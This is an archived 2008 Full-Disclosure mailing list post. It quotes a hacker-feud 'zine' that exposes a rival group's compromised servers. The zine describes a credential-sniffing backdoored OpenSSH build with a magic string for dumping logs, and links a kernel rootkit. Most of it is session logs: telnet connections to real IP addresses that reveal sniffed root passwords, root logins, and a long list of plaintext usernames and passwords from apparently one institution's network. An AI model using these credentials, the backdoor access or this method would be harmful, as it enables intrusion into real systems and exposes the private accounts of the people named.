| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 31 Aug 2008 16:29:56 -0400 From: Thedjatclubrock <tdjacr.wiki@...il.com> CC: full-disclosure@...ts.grok.org.uk Subject: Re: x0x0x? its a joke! Robert Holgstad wrote: > you got owned by lamers, why do we care what you think or say? > > also you complain that all they can do is use modified sshd versions > and that this makes them lame, but during your 'zine' this is all > you are doing. does this also make you 'lamer'? > > > On Sat, Aug 30, 2008 at 1:40 PM, bussinessinbox box > <bussinessinbox@...il.com <mailto:bussinessinbox@...il.com>> wrote: > > SOMEONE OWNED IN http://labsec.elite.vc/x0x0x-exposed.txt > > > > #!/labsec/v/for/vendetta:book1-x0x0x > ###################################################################################################################### > > > # # > # .____ ___. _________ # > > > # | | _____ \_ |__ / _____/ ____ ____ # > # | | \__ \ | __ \ \_____ \_/ __ \_/ ___\ # > > > # | |___ / __ \| \_\ \/ \ ___/\ \___ # > # |_______ (____ /___ /_______ /\___ >\___ > # > > > # \/ \/ \/ \/ \/ \/ # > # .___ .___ __ .__ # > > > # | | ____ __| _/_ __ _______/ |________|__| ____ ______ # > # | |/ \ / __ | | \/ ___/\ __\_ __ \ |/ __ \ / ___/ # > > > # | | | \/ /_/ | | /\___ \ | | | | \/ \ ___/ \___ \ # > # |___|___| /\____ |____//____ > |__| |__| |__|\___ >____ > # > > > # \/ \/ \/ \/ \/ # > # # > > > # # > # - presents: # > > > # \- x0x0x exposed -/ # > # # > > > ###################################################################################################################### > # # > # # > > > # chapter one : random lame stuff # > # chapter two : owned by yourself # > # chapter three : download files/sniffs/stuff # > # chapter four : conclusion # > > > # - x0x0x - # > # # > # # > # - [V]endetta. # > > > # # > ################################################################# > > > - <l> hello everyone ! > - <l> the reason of this zine(which by teh way we dont like) is: vendetta >:) > > > - <l> we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x) > - <l> now it's vendetta time ! > > > ################################################################# > > > # # > # # > # _ _ # > # __| |_ __ _ _ __| |_ ___ _ _ ___ _ _ ___ # > > > # / _| ' \/ _` | '_ \ _/ -_) '_| / _ \ ' \/ -_) # > # \__|_||_\__,_| .__/\__\___|_| \___/_||_\___| # > # |_| # > > > # # > # # > ################################################################# > > > first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw)) > > > > [1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt > [2]; http://lasercomb.de/x0x0x2.txt > > > > have you noticed how lame they are ? > > all they can & will ever do is change your openssh version to a cracked one > and pray that the users will log into some kool server > > and guess what, its NOT EVEN MADE by them ! - lets check it out - > > > > central@...sec [~xoxox/openssh-4.7p1] # more skynet.h > /* > > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > > > #### ### #### ### # #### ## > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > > > #### #### ## #### ### ## ###### #### > > - V E R S I O N 1. 0 - > coded by fmrj > 11.01.2008 > > > > > Features: > - Logs SSH, SCP, SFTP, SSHD and ip / hostname > - ftp logger included (netkit-ftp) > - Encrypted sniffer logs > - SSH, SCP, SFTP will not log you > - compile script (see compile.sh) > > > - rootlogin is permitted even though remoterootlogin is set to no > - Will not log to syslog, utmp, wtmp or lastlog > - If MAGIC_VERSION is NOT undeclared: > telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in. > > > (WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump) > Also this will NOT get logged by syslog > > > Future features: > - pid hiding > - More encryption / better sniffer encryption (thought of rc-crypt) > > > - strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log > - Have a cool PS1 for the bd > - Write a ssh client that can: > -> Connect and dump logs so you dont have to use telnet approach (encrypted) > > > -> That can do connect-chain (ssh -bounce box1 box2 box3) > > > If you have this, it either means we are friends or someone gave it to you, if so > I would like this bd to be kept as private as possible, so please dont pass it on > > > > I would also appreciate suggestions / ideas / help / whatever for future features > aim: fmrj09 > > > - Thanks * > > */ > > - then there is some shit aion code which is public @ packetstorm - > > - their kool sshd backdoor kan be found in the end of thiz zine - > > - dont forget to check the gr8 shellscript skotch made - > > ################################## leTz hIghTlIghT 50m3th1n6 ############################# > telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in. > > > ################################## LETS HIGHLIGHT SOMETHING ############################# > > ohhhhhhwwwwwwww. k00l 3n0ugh ! > and gu355 wh47 ? > th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 ! > > > > *thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks* > > > central@...sec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h > #define MAGIC_VERSION "netdump" > > > > > ----- th4nk5 8uddY ------ > ----- end of lame sshd backdor ---- > > ***************** phalanx the gr8 kernel rootkit *************** > > 7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH ! > whAT ELsE Do thEY USE ? > > > > PHALANX ! THE gr8 prIv8 kERn3l r007k17 > get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2 > > > > * attached their k00l phalanx in the bottom of the zine * > > ***************** phalanx the gr8 kernel rootkit *************** > > ------ funny stuff: > > while looking at their boxes, we felt so disappointed that they cant even write the right sshd version.. > > > > [139.82.95.11:22 <http://139.82.95.11:22>] : SSH-2.0-p2-FC-4.3 > [212.200.96.150:22 <http://212.200.96.150:22>] : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006 > > [216.75.56.186:22 <http://216.75.56.186:22>] : SSH-2.0-OenSSH_4.2 > > [140.122.141.164:2174 <http://140.122.141.164:2174>]: SSH-2.0-p1 Debian-5ubuntu0.5 > [143.107.250.214:22 <http://143.107.250.214:22>] : SSH-1.99-p1 > [201.62.131.185:22 <http://201.62.131.185:22>] : SSH-2.0-p1 Debian-8ubuntu1.2 > > > [200.144.189.17:22 <http://200.144.189.17:22>] : SSH-1.99-p1 > > you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers? > > answer: bad system admins. doing a easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check their sshd banners. > > > > [[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]] > they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no longer use them, k ? > > > they blame us about using the same password, what about thei magic_password ? kool, they use the 'netdump' on all their boxes, > which is the reason for the chapter two. > [[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]] > > > > ################################################################# > # # > # __ __ __ # > # ____/ / ___ ____ / /____ ____ / /__ _____ # > > > # / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \ # > # \__/_//_/\_,_/ .__/\__/\__/_/ \__/|__,__/\___/ # > # /_/ # > # # > > > # # > ################################################################# > > ; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS > ; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL > > > ; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl > ; > ; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE > > > > > central@...sec [~xoxox/h3h3] # telnet 189.3.219.4 <http://189.3.219.4> 22 > > > Trying 189.3.219.4... > Connected to 189.3.219.4 <http://189.3.219.4> (189.3.219.4 <http://189.3.219.4>). > Escape character is '^]'. > SSH-2.0-OpenSSH_4.7 > > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;/// > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: R4tD33Gl (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh localhost dewd > > > - cut- > > ******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ******************** > central@...sec [~xoxox/h3h3] # ssh root@....3.219.4 <mailto:root@....3.219.4> > > > root@....3.219.4 <mailto:root@....3.219.4>'s password: > > > > Last login: Fri Aug 8 16:27:40 2008 from 189.4.161.222 <http://189.4.161.222> > > > > **** Connected to **** > > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > ### #### ## ##### ## ## > > > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux servnet 2.6.18-4-486 i686 **** > > root@...vnet:~# > > > root@...vnet:~# uname -a;/sbin/ifconfig -a|grep inet > Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux > inet addr:189.3.219.4 <http://189.3.219.4> Bcast:189.3.219.63 <http://189.3.219.63> Mask:255.255.255.192 <http://255.255.255.192> > > > > root@...vnet:~# last -1 root > root pts/2 189.4.161.222 <http://189.4.161.222> Fri Aug 8 16:27 - 16:32 (00:04) > 222.161.4.189.in-addr.arpa domain name pointer bd04a1de.virtua.com.br <http://bd04a1de.virtua.com.br>. > > > > > ******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ******************** > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > > central@...sec [~xoxox/h3h3] # telnet 91.199.207.141 <http://91.199.207.141> 22 > Trying 91.199.207.141... > Connected to 91.199.207.141 <http://91.199.207.141>. > > Escape character is '^]'. > > SSH-2.0-OpenSSH_4.3 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: buCeTTT (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks. > > > pass_from: 91.199.207.142 <http://91.199.207.142> user: root pass: salinarsalinar (x2.sprintdns.net <http://x2.sprintdns.net>) -->>>>>>>>>> i hope you guys change the passwd real quick :) > > > > central@...sec [~xoxox/h3h3] # ssh root@...199.207.141 <mailto:root@...199.207.141> > root@...199.207.141 <mailto:root@...199.207.141>'s password: > > > Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz <http://97.139.broadband2.iol.cz> > > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > > > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux x1 2.6.18-6-686 i686 **** > > > > root@x1:~# > root@x1:~# uname -a;w;last -1 root > Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux > 08:24:44 up 9 days, 14:48, 0 users, load average: 0.17, 0.11, 0.09 > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > > > root pts/0 97.139.broadband Sun Aug 10 12:17 - 12:38 (00:20) > root@x1:~# ifconfig -a|grep inet > inet addr:91.199.207.141 <http://91.199.207.141> Bcast:91.199.207.255 <http://91.199.207.255> Mask:255.255.255.0 <http://255.255.255.0> > > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # telnet 195.91.248.58 <http://195.91.248.58> 22 > > > Trying 195.91.248.58... > Connected to 195.91.248.58 <http://195.91.248.58>. > Escape character is '^]'. > SSH-2.0-OpenSSH_4.7 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: DiVRuu (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in. > > > > > central@...sec [~xoxox/h3h3] # ssh root@....91.248.58 <mailto:root@....91.248.58> > root@....91.248.58 <mailto:root@....91.248.58>'s password: > > > Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru <http://ppp85-140-31-214.pppoe.mtu-net.ru> > > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > > > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux localhost 2.6.24-gentoo-r3 i686 **** > > > > localhost ~ # > localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet > Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz GenuineIntel GNU/Linux > > > 10:30:35 up 1 day, 22:21, 0 users, load average: 0.15, 0.12, 0.09 > USER TTY LOGIN@ IDLE JCPU PCPU WHAT > root pts/1 ppp85-140-31-214 Mon Aug 11 13:00 - 13:07 (00:06) > > wtmp begins Mon Mar 31 21:49:08 2008 > > > inet addr:195.91.248.58 <http://195.91.248.58> Bcast:195.91.248.63 <http://195.91.248.63> Mask:255.255.255.240 <http://255.255.255.240> > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > central@...sec [~xoxox/h3h3] # telnet 195.71.126.86 <http://195.71.126.86> 22 > Trying 195.71.126.86... > Connected to 195.71.126.86 <http://195.71.126.86>. > > Escape character is '^]'. > > SSH-2.0-OpenSSH_4.2 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet. > pam_from: 91.128.212.13 <http://91.128.212.13> user: root pass: w22662s (d91-128-212-13.cust.tele2.at <http://d91-128-212-13.cust.tele2.at>) ---->>>> no localhost this time(yay!) but it works. > > > > central@...sec [~xoxox/h3h3] # ssh root@....71.126.86 <mailto:root@....71.126.86> > root@....71.126.86 <mailto:root@....71.126.86>'s password: > > root@...2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet > > > Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux > 08:34:52 up 42 days, 19:58, 3 users, load average: 0,91, 1,05, 1,07 > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > > > root pts/39 chello0841120232 Sat00 3days 0.93s 0.89s mc > root pts/5 chello0841120232 Fri09 2days 0.01s 0.01s -bash > root pts/7 chello0841120232 Fri23 2days 1:20 1:20 mc > inet Adresse:195.71.126.86 <http://195.71.126.86> Bcast:195.71.126.95 <http://195.71.126.95> Maske:255.255.255.240 <http://255.255.255.240> > > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # telnet 152.66.208.100 <http://152.66.208.100> 22 > > > Trying 152.66.208.100... > Connected to 152.66.208.100 <http://152.66.208.100>. > Escape character is '^]'. > SSH-2.0-OpenSSH_4.3 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am. > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: joeb pass: xaoAs.. (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb > > > pass_from: 78.131.80.171 <http://78.131.80.171> user: joeb pass: milegyen (78-131-80-171.pool.hdsnet.hu <http://78-131-80-171.pool.hdsnet.hu>) > better be changing that by now. > > > SSH2_OUT: 78.131.80.171 <http://78.131.80.171> user: joeb pass: megistudom (78-131-80-171.pool.hdsnet.hu <http://78-131-80-171.pool.hdsnet.hu>)> better be changing that by now. > > > SSH2_OUT: 84.2.126.154 <http://84.2.126.154> user: joeb pass: valami (dsl54027E9A.pool.t-online.hu <http://dsl54027E9A.pool.t-online.hu>) > better be changing that by now. > > > > central@...sec [~xoxox/h3h3] # ssh root@....66.208.100 <mailto:root@....66.208.100> > root@....66.208.100 <mailto:root@....66.208.100>'s password: > > Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu <http://78-131-80-171.pool.hdsnet.hu> > > > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > > > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux maszat 2.6.18-6-686-bigmem i686 **** > > > > root@...zat:~# > root@...zat:~# uname -a;w;/sbin/ifconfig -a|grep inet > Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux > 08:41:36 up 25 days, 16:08, 0 users, load average: 0.19, 0.15, 0.05 > > > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > inet addr:152.66.208.100 <http://152.66.208.100> Bcast:152.66.208.127 <http://152.66.208.127> Mask:255.255.255.128 <http://255.255.255.128> > > > inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > > > central@...sec [~xoxox/h3h3] # telnet 147.46.242.9 <http://147.46.242.9> 22 > Trying 147.46.242.9... > Connected to 147.46.242.9 <http://147.46.242.9>. > Escape character is '^]'. > > > SSH-2.0-OpenSSH_4.7 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ? > > > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: NjKeyJ (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y. > > > pass_from: 147.46.242.52 <http://147.46.242.52> user: dreameye pass: ii1945 (ropas.snu.ac.kr <http://ropas.snu.ac.kr>) ------>>>>>>>>>>>>>> sorry koreans, nothing personal. > > > pass_from: 211.48.102.167 <http://211.48.102.167> user: dk pass: 0ghafjs ------>>>>>>>>>>>>>> i mean, personal with you, you no. > > > > central@...sec [~xoxox/h3h3] # ssh root@....46.242.9 <mailto:root@....46.242.9> > root@....46.242.9 <mailto:root@....46.242.9>'s password: > > Last login: Thu Aug 7 03:35:51 2008 from ropas.snu.ac.kr <http://ropas.snu.ac.kr> > > > > **** Connected to **** > > ### # ### ## ### ## ### ### ###### ###### > ## # ## # ## ## ## # ## # # ## # > #### ### #### ### # #### ## > > > ### #### ## ##### ## ## > # ## ## ## ## ## ## ## ## ## > #### #### ## #### ### ## ###### #### 1.0 > **** Linux abs 2.6.24-19-server i686 **** > > > > root@abs:~# > root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye > Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux > 15:49:37 up 8 days, 1:53, 0 users, load average: 0.00, 0.00, 0.00 > > > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > inet addr:147.46.242.9 <http://147.46.242.9> Bcast:147.46.242.255 <http://147.46.242.255> Mask:255.255.255.0 <http://255.255.255.0> > > > inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link > inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0 <http://255.0.0.0> > inet6 addr: ::1/128 Scope:Host > > dreameye pts/0 ropas.snu.ac.kr <http://ropas.snu.ac.kr> Thu Aug 7 03:35 - 03:36 (00:00) > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # telnet 200.160.119.92 <http://200.160.119.92> 8022 ----- same applies for 200.160.119.93 <http://200.160.119.93> (another dumbox on the network) > > > Trying 200.160.119.92... > Connected to 200.160.119.92 <http://200.160.119.92>. > Escape character is '^]'. > SSH-2.0-OpenSSH_4.3 > netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my netdump user? > > > pass_from: 192.168.100.231 <http://192.168.100.231> user: root pass: m4c4c0z3e1 (tradestation231.eum.intranet)> hello m0nk3y > > central@...sec [~xoxox/h3h3] # ssh root@....160.119.92 <mailto:root@....160.119.92> -p 8022 > > > root@....160.119.92 <mailto:root@....160.119.92>'s password: > > ******* no skynet thiz timE *********** h3h3h3h3 *********** > > Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet > > > root@...isrvgw2:~# > root@...isrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet > Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux > 03:18:45 up 24 days, 9:43, 0 users, load average: 0.01, 0.03, 0.00 > > > USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT > inet addr:192.168.100.242 <http://192.168.100.242> Bcast:192.168.100.255 <http://192.168.100.255> Mask:255.255.255.0 <http://255.255.255.0> > > > inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link > inet addr:192.168.200.254 <http://192.168.200.254> Bcast:192.168.200.255 <http://192.168.200.255> Mask:255.255.255.0 <http://255.255.255.0> > > > inet addr:200.160.119.92 <http://200.160.119.92> Bcast:200.160.119.95 <http://200.160.119.95> Mask:255.255.255.240 <http://255.255.255.240> > > inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link > > inet addr:200.169.223.172 <http://200.169.223.172> Bcast:200.169.223.175 <http://200.169.223.175> Mask:255.255.255.248 <http://255.255.255.248> > > > root@...isrvgw2:~# last -10 root|grep 189\.4 > > root pts/0 189.4.161.222 <http://189.4.161.222> Mon Aug 11 14:24 - 14:44 (00:19) ----------------------->>>>> i wonder who that kool ip iz. > ----------------------->>>>> bruteforce again? what a zhame ! > > > -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- > > central@...sec [~xoxox/h3h3] # telnet 200.20.9.67 <http://200.20.9.67> 22 > > > Trying 200.20.9.67... > Connected to 200.20.9.67 <http://200.20.9.67>. > Escape character is '^]'. > SSH-2.0-OpenSSH_4.3 > netdump > SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass: vEcTrrA (localhost) > > > > central@...sec [~xoxox/h3h3] # ssh root@....20.9.67 <mailto:root@....20.9.67> -p 8022 > root@....20.9.67 <mailto:root@....20.9.67>'s password: > > root@...1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet > > > Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux > 04:38:02 up 54 days, 1:50, 17 users, load average: 0.05, 0.01, 0.00 > root@...1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT ------------>> this is their default sniffer path. > > > SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: lourenco pass: LiNuX0527 (didi.if.uff.int <http://didi.if.uff.int>) > SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: lourenco pass: LiNuXS0527 (didi.if.uff.int <http://didi.if.uff.int>) > > > SSH2_OUT: 10.0.0.101 <http://10.0.0.101> user: nuno pass: surfar (catuaba.if.uff.int <http://catuaba.if.uff.int>) > SSH2_OUT: 10.0.0.106 <http://10.0.0.106> user: lourenco pass: LiNuX0527 (cerbero4.if.uff.int <http://cerbero4.if.uff.int>) > > > SSH2_OUT: 10.0.0.108 <http://10.0.0.108> user: critter pass: 559832 (ronaldinho.if.uff.int <http://ronaldinho.if.uff.int>) > SSH2_OUT: 10.0.0.136 <http://10.0.0.136> user: davidvaz pass: 2o3145 (barabasi.if.uff.int <http://barabasi.if.uff.int>) > > > SSH2_OUT: 10.0.0.145 <http://10.0.0.145> user: lubian pass: 15862jLr (lip-serverI.if.uff.int <http://lip-serverI.if.uff.int>) > SSH2_OUT: 10.0.0.147 <http://10.0.0.147> user: mcosta pass: 950205 (nano3.if.uff.int <http://nano3.if.uff.int>) > > > SSH2_OUT: 10.0.0.155 <http://10.0.0.155> user: asa pass: gabixande2 (nanodc01.if.uff.int <http://nanodc01.if.uff.int>) > SSH2_OUT: 10.0.0.155 <http://10.0.0.155> user: mcosta pass: 950205 (nanodc01.if.uff.int <http://nanodc01.if.uff.int>) > > > SSH2_OUT: 10.0.0.156 <http://10.0.0.156> user: thiagofts pass: 8vacagk (Owner-PC.if.uff.int <http://Owner-PC.if.uff.int>) > SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: alanfr pass: ck37=2x (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>) > > > SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: curso pass: curso (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>) > SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: help pass: slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>) > > > SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: opeador pass: slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>) > SSH2_OUT: 10.0.0.157 <http://10.0.0.157> user: operador pass: slacksucks! (ltspsrvr.if.uff.int <http://ltspsrvr.if.uff.int>) > > > SSH2_OUT: 10.0.0.179 <http://10.0.0.179> user: orahcio pass: wulto12 (viagra.if.uff.int <http://viagra.if.uff.int>) > SSH2_OUT: 10.0.0.188 <http://10.0.0.188> user: nuno pass: surfar (catuaba.if.uff.int <http://catuaba.if.uff.int>) > > > SSH2_OUT: 10.0.0.195 <http://10.0.0.195> user: asa pass: gabixande2 (nano2.if.uff.int <http://nano2.if.uff.int>) > SSH2_OUT: 10.0.0.196 <http://10.0.0.196> user: isidoro pass: VU4R9C (zico.if.uff.int <http://zico.if.uff.int>) > > > SSH2_OUT: 10.0.0.2 <http://10.0.0.2> user: isidoro pass: VU4R9C > SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: davidvaz pass: 2o3145 (homer.if.uff.int <http://homer.if.uff.int>) > > > SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: davidvaz pass: o3145 (homer.if.uff.int <http://homer.if.uff.int>) > SSH2_OUT: 10.0.0.208 <http://10.0.0.208> user: tgmattos pass: CAMtgm&7 (homer.if.uff.int <http://homer.if.uff.int>) > > > SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: asa pass: gabixande2 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>) > SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: lourenco pass: LiNuX0527 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>) > > > SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: lourenco pass: LiNuX05427 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>) > SSH2_OUT: 10.0.0.217 <http://10.0.0.217> user: dionizio pass: Zoedoulos (cerbero9.if.uff.int <http://cerbero9.if.uff.int>) > > > SSH2_OUT: 10.0.0.217 <http://10.0.0.217> user: lourenco pass: LiNuX0527 (cerbero9.if.uff.int <http://cerbero9.if.uff.int>) > SSH2_OUT: 10.0.0.222 <http://10.0.0.222> user: lourenco pass: LiNuX0527 (romario.if.uff.int <http://romario.if.uff.int>) > > > SSH2_OUT: 10.0.0.222 <http://10.0.0.222> user: lourenco pass: LiNuX527 (romario.if.uff.int <http://romario.if.uff.int>) > SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: dionizio pass: Zoedoulos (cerbero10.if.uff.int <http://cerbero10.if.uff.int>) > > > SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: lourenco pass: LiNuX0527 (cerbero10.if.uff.int <http://cerbero10.if.uff.int>) > SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: lourenco pass: exit (cerbero10.if.uff.int <http://cerbero10.if.uff.int>) > > > SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: jssm pass: Jujaja (complex000.if.uff.int <http://complex000.if.uff.int>) > SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: nuno pass: surfar (complex000.if.uff.int <http://complex000.if.uff.int>) > > 